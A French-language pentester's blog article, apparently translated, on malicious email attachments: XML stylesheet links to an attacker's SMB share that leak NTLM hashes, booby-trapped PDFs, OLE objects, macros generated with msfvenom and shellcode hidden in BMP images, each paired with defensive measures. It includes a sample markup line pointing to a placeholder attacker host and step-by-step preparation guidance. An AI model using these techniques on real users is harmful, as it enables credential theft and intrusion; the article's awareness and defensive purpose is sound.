L'ouverture ne peut pas être ignorée

Mon travail est lié au fait que je mens aux gens et que j'exploite leur crédulité, leur curiosité, leur cupidité, etc. J'adore mon travail et j'essaie de l'aborder de façon créative. Les spécificités de mon activité sont liées à la conduite d'attaques par la méthode de l'ingénierie sociale. Et dans ce post, je voudrais parler des pièces jointes malveillantes.

Si le PDF tombe dans votre courrier, allez-vous l'ouvrir? Et le fichier Word? Allez-vous ouvrir l'image à partir d'une source inconnue? Est-il possible de rencontrer des problèmes si vous téléchargez l'archive? Dans quelle mesure savez-vous quels investissements sont dangereux et lesquels ne le sont pas? Et vos collègues?

Pour plusieurs dizaines de projets, j'ai essayé des façons complètement différentes de fournir la charge utile à l'utilisateur. Certains ont été très efficaces, certains ont été facilement détectés - chacun a ses propres inconvénients et avantages. Je ne vous dirai pas comment emballer les fichiers exécutables avec l'extension .exe dans l'archive. Avec une telle approche à l'ancienne, percer les systèmes de sécurité, puis obliger l'utilisateur à démarrer la pièce jointe, est plus cher. Je vais vous dire quels fichiers potentiellement dangereux peuvent être reçus par la poste (ou envoyés) aujourd'hui.

Avis de non-responsabilité: Tout ce qui suit est à titre informatif uniquement. L'auteur décrit l'expérience acquise lors des pentests, n'est pas responsable de la répétition de ces attaques et encourage à ne pas utiliser le matériel à des fins illégales.

XML

L'essence de la méthode

La plupart des fichiers Office sont basés sur Microsoft Office Open XML (OOXML), qui est essentiellement un format XML compressé développé par Microsoft pour présenter des tableaux, des graphiques, des présentations, etc. L'implication XML est affichée dans l'extension du document (docx, xlsx, pptx). Il est très curieux que ces documents Office puissent être ouverts en tant que fichier texte normal avec toutes les balises et les attributs. Tout fichier Office Open XML peut être enregistré au format XML et apporter des modifications aux balises. Par exemple, ajoutez un lien vers un dossier public contrôlé par un attaquant. Lorsque vous exécutez le fichier XML, il essaie de se connecter à un dossier public ouvert. Lorsque vous essayez de vous connecter via le protocole smb, Windows fournit gentiment un hachage NTLM (NTLMv2) et une connexion utilisateur à un attaquant.



La mise en œuvre en bref

Pour implémenter le vecteur, vous devez créer un document Office Open XML (docx, pptx, xlsx, etc.), l'enregistrer au format XML. Ouvrez XML et apportez les modifications suivantes:

<?xml-stylesheet type="text/xsl" href="\\xxx.xxx.xxx.xxx \test\swordfish.xsl ">

Dans la balise spécifiée, vous devez spécifier l'adresse du dossier de réseau public auquel la victime se connectera.

Remarque : au lieu de ="\\xxx.xxx.xxx.xxx\test\swordfish.xsl vous pouvez écrire le file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl . Ensuite, le fichier doit être enregistré et envoyé à la victime.

Des informations sur l'attaque sont disponibles ici .

Remarque : selon le système d'exploitation et les paramètres, l'utilisateur peut être amené à accepter des conditions ou des commentaires supplémentaires, par exemple:



Un article serait incomplet sans conseil de protection:

• Utilisez une politique de mot de passe complexe.
• Utilisez NTLMv2.
• Refuser le trafic externe via smb (TCP 139/445).

Mauvais pdf

L'essence de la méthode

Une balise est ajoutée au fichier PDF avec un lien vers un serveur public smb contrôlé par l'attaquant. Comme dans l'exemple ci-dessus, lors de l'ouverture d'un fichier, le système d'exploitation transmet un hachage NTLM (NTLMv2) pour se connecter au dossier public.

La mise en œuvre en bref

La mise en œuvre de cette attaque est beaucoup plus facile que la précédente. Pour réussir à voler un hachage, téléchargez simplement l'utilitaire (git clone ici ou ici ) et donnez le droit d'exécuter (chmod + x) le fichier python. Ensuite, exécutez le script python et entrez l'adresse IP, le nom de fichier et l'interface, comme dans la figure ci-dessous.


Génération d'un fichier de charge utile.

Le dossier reçu peut être envoyé par la poste sous couvert de félicitations, d'un document à signer, d'un scan de la candidature, etc. Lorsque le fichier démarre, tous les hachages seront envoyés à l'attaquant.



La protection

• Utilisez une politique de mot de passe complexe.
• Utilisez NTLMv2.
• Refuser le trafic externe via smb (TCP 139/445).

Objet OLE

L'essence de la méthode

Dans un document Office légitime, un script lancé en cliquant est incorporé. Le script peut être absolument n'importe lequel, c'est généralement juste une charge utile. Il a sa propre icône, qui peut être modifiée, selon les désirs de l'attaquant, jusqu'à une copie complète du style des documents Office qui simulent les messages d'erreur. Contrairement aux macros, un fichier avec une pièce jointe OLE n'est pas suspect pour les utilisateurs ordinaires.


La mise en œuvre en bref

Pour se préparer à cette attaque, il faudra dépenser un peu plus d'efforts (par rapport à ceux ci-dessus). La première étape consiste à générer une charge utile. Ensuite, vous devez démarrer le serveur, qui recevra les connexions de la charge utile, puis créer un document Word, le convertir en RTF et ajouter un lien vers la charge utile. Si brièvement.
Des informations sur l'attaque sont disponibles ici .

La protection

Pour vous protéger contre de telles attaques, nous vous recommandons d' effectuer les modifications de registre suivantes:

HKCUSoftwareMicrosoftOffice -> Office Version -> Office application -> SecurityPackagerPrompt

La valeur de la Office Version peut être 16,0 (Office 2016); 15,0 (Office 2013); 14,0 (Office 2010); ou 12.0 (Office 2007). La valeur de l' Office application est le nom d'une application Office spécifique, c'est-à-dire Word, Excel, etc.

La valeur de cette clé de registre doit être "2", ce qui signifie "Aucune invite, l'objet ne s'exécute pas" ou une interdiction réelle de l'exécution des objets. Une valeur de "1" permet à l'utilisateur de "Demander à partir d'Office lorsque l'utilisateur clique, l'objet s'exécute", c'est-à-dire que les objets sont cliqués et qu'Office affiche le message correspondant. La valeur «0», à son tour, signifie «Aucune invite d'Office lorsque l'utilisateur clique, l'objet s'exécute», en d'autres termes, les objets sont exécutés, mais l'utilisateur ne reçoit aucun message d'Office.

Des modifications peuvent être apportées si ces fonctions ne sont pas utilisées dans les processus commerciaux de votre entreprise.

Macros

Depuis OLE a été mentionné, comment puis-je ne pas mentionner les macros?



L'essence de la méthode

Macro - un ensemble de commandes conçues pour simplifier le travail de l'utilisateur. Potentiellement, vous pouvez écrire absolument n'importe quel ensemble de commandes dans une macro et ainsi obtenir une charge utile. Pour créer un document avec une macro, un attaquant doit simplement masquer le code de charge utile et ajouter le code à la macro de document.

La mise en œuvre en bref

Il existe actuellement de nombreuses façons de générer une macro. Vous pouvez utiliser l'outil Luckystrike ou vous arrêter au Metasploit plus familier. Vous pouvez utiliser msfvenom et masquer la macro après la génération. Une fois la macro créée, il vous suffit de l'ajouter au document Office. Mais contrairement à une pièce jointe OLE, vous avez vraiment besoin de beaucoup d'efforts pour exécuter une macro. Pour le moment, très peu d'utilisateurs exécuteront des macros. Windows a déjà appris à mettre en garde contre les macros suspectes, et on a beaucoup parlé de leur danger.

La protection

Pour plus de fiabilité, je recommande de désactiver l'exécution des macros sans notification.

BMP

Il est très peu probable que vous rencontriez un attachement BMP avec un shellcode, alors soyez conscient: il y en a.

L'essence de la méthode

Le code shell est intégré dans l'image au format BMP. L'image elle-même n'est pas dangereuse au moment de la découverte. Il ne s'agit pas de laisser un attaquant prendre une session. L'image est nécessaire pour mentir et attendre l'heure où l'attaquant l'activera à l'aide de la commande Powershell. Cette méthode n'est pas tant une attaque qu'un contournement d'antivirus et d'outils de détection d'intrusion.

La mise en œuvre en bref

Pour créer une image, utilisez simplement ce référentiel . DKMC fournit tout, de la génération d'images à l'obscurcissement de code. Je veux également noter que l'image "infectée" contiendra d'étranges pixels multicolores. Cela peut être facilement résolu si vous recadrez la zone visible de l'image de 5 à 10 pixels.

Après avoir créé l'image, le fichier doit être remis à la victime et attendre la bonne occasion ou chercher l'opportunité d'exécuter le script powershell.

La protection

Filtrer chaque fichier bmp comme potentiellement dangereux est inefficace. Vous pouvez utiliser des convertisseurs et enregistrer des images dans d'autres formats, inspecter des fichiers sur des ordinateurs ou accepter le fait que si un attaquant a réussi à utiliser le script PowerShell sur l'ordinateur d'un employé, la présence d'une image avec le code shell n'est pas le principal problème de sécurité.

En fait, c'est tout. J'espère que cet article a élargi votre compréhension des investissements et des dangers qu'ils peuvent comporter. Nous parlerons des liens suspects un peu plus tard.



Ekaterina Rudaya ( Caterin ), experte au laboratoire d'analyse pratique de la sécurité, Jet Infosystems